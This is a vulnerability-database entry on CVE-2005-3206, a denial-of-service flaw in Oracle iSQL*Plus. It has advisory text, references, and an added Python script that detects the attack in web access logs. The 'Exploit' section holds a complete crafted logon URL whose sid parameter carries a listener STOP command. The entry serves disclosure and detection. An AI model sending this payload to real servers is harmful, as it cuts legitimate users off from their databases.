Oracle iSQL*Plus TNS Listener Remote Denial of Service Vulnerability


Vulnerability ID: 1109117
Vulnerability type: Access validation error
Published: 2005-10-07
Updated: 2005-10-20
CVE ID: CVE-2005-3206
CNNVD-ID: CNNVD-200510-096
Platform: Multiple
CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/26331
https://cxsecurity.com/issue/WLB-2005100024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200510-096
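|Vulnerability details
Oracle is a large commercial database system. A vulnerability in Oracle iSQL*Plus allows remote attackers to terminate the TNS Listener service by issuing a specially crafted HTTP request, denying further database service to legitimate users.
|Exploit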
source: http://www.securityfocus.com/bid/15032/info

Oracle iSQL*PLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users.

By issuing a specific HTTP request, remote attackers may cause the affected application to stop the TNS Listener.

This issue was reported in Oracle Database version 9.0.2.4; other versions may also be affected.

These issues were originally described and addressed in Oracle Critical Patch Update - July 2005, BID 14238 (Oracle July Security Update Multiple Vulnerabilities). Due to the availability of more information, these issues are being assigned a separate BID.

http://www.example.com:3339/isqlplus?username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29&login=Login&action=logon
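
A detection check for the request above, as an added example that is not part of the original advisory: it URL-decodes the `sid` parameter of iSQL*Plus logon requests in a web access log and flags any value that carries a `COMMAND=` key, which a login connect descriptor has no reason to contain. The function names, the combined log format and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# COMMAND=<word> inside a TNS descriptor; keys are case-insensitive and may
# be padded with whitespace.
COMMAND_RE = re.compile(r"\(\s*COMMAND\s*=\s*([A-Za-z_]+)\s*\)", re.IGNORECASE)
# Request target from a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def listener_command_in_sid(url):
    """Return the listener command carried in the sid parameter of an
    iSQL*Plus logon URL (upper-cased), or None when there is none."""
    parts = urlsplit(url)
    if not parts.path.lower().rstrip("/").endswith("/isqlplus"):
        return None
    for sid in parse_qs(parts.query).get("sid", []):  # values are URL-decoded
        match = COMMAND_RE.search(sid)
        if match:
            return match.group(1).upper()
    return None

def scan_access_log(lines):
    """Return (client_ip, command) for every flagged request line."""
    hits = []
    for line in lines:
        request = REQUEST_RE.search(line)
        command = listener_command_in_sid(request.group(1)) if request else None
        if command:
            hits.append((line.split()[0], command))
    return hits

# Query string of the request shown on this page.
PAGE_QUERY = ("username=s&password=s&sid=%28DESCRIPTION%3D%28ADDRESS_LIST%3D"
              "%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Dlocalhost%29"
              "%28PORT%3D1521%29%29%29%28CONNECT_DATA%3D%28COMMAND%3DSTOP%29"
              "%28SERVICE%3DLISTENER%29%28USER%3DHacker%29%29%29"
              "&login=Login&action=logon")
# Constructed benign descriptor and constructed log lines (not real traffic).
BENIGN = ("%28DESCRIPTION%3D%28ADDRESS%3D%28PROTOCOL%3DTCP%29%28HOST%3Ddb1%29"
          "%28PORT%3D1521%29%29%28CONNECT_DATA%3D%28SERVICE_NAME%3Dorcl%29%29%29")
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Oct/2005:10:01:02 +0000] "GET /isqlplus?username=scott&sid=ORCL&action=logon HTTP/1.1" 200 5120',
    f'192.0.2.11 - - [07/Oct/2005:10:02:40 +0000] "GET /isqlplus?username=scott&sid={BENIGN}&action=logon HTTP/1.1" 200 5120',
    f'203.0.113.5 - - [07/Oct/2005:10:03:17 +0000] "GET /isqlplus?{PAGE_QUERY} HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for ip, command in scan_access_log(SAMPLE_LOG):
        print(f"{ip}: listener command {command} in iSQL*Plus sid parameter")
```

Logons submitted via POST do not expose the `sid` value in the access log's request line, so the same check would have to run where the request body is visible.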
|References

Source: MISC
Link: http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html
Source: SECUNIA
Name: 15991
Link: http://secunia.com/advisories/15991/
Source: XF
Name: oracle-isql-tns-dos(22544)
Link: http://xforce.iss.net/xforce/xfdb/22544
Source: BID
Name: 15032
Link: http://www.securityfocus.com/bid/15032
Source: MISC
Link: http://www.red-database-security.com/advisory/oracle_isqlplus_shutdown.html
Source: BUGTRAQ
Name: 20051007 Shutdown TNS Listener via Oracle iSQL*Plus
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112870589127719&w=2
Source: FULLDISC
Name: 20051007 Shutdown TNS Listener via Oracle iSQL*Plus
Link: http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0176.html
Source: OSVDB
Name: 20056
Link: http://www.osvdb.org/20056
Source: SREASON
Name: 64
Link: http://securityreason.com/securityalert/64
